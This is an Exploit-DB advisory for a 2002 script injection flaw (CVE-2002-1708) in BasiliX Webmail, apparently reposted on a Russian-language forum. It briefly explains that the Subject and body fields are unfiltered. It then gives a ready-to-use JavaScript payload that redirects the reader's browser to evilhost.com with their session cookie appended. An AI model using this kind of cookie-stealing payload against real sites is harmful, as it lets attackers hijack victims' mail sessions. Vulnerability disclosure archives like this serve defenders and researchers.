- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21570
- Проверка EDB
-
- Пройдено
- Автор
- ULF HARNHAMMAR
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2002-1708
- Дата публикации
- 2002-06-19
Код:
source: https://www.securityfocus.com/bid/5060/info
BasiliX is a web-based mail application. It offers features such as mail attachments, address book, multiple language and theme support.
A script injection issue has been reported in BasiliX Webmail. Script commands are not filtered from the Subject or message body, and may execute in the context of the BasiliX site when the content is viewed.
This has been reported in BasiliX Webmail 1.1.0, earlier versions may also be affected.
<script>self.location.href="http://evilhost.com/evil?"+escape(document.
cookie)</script>- Источник
- www.exploit-db.com
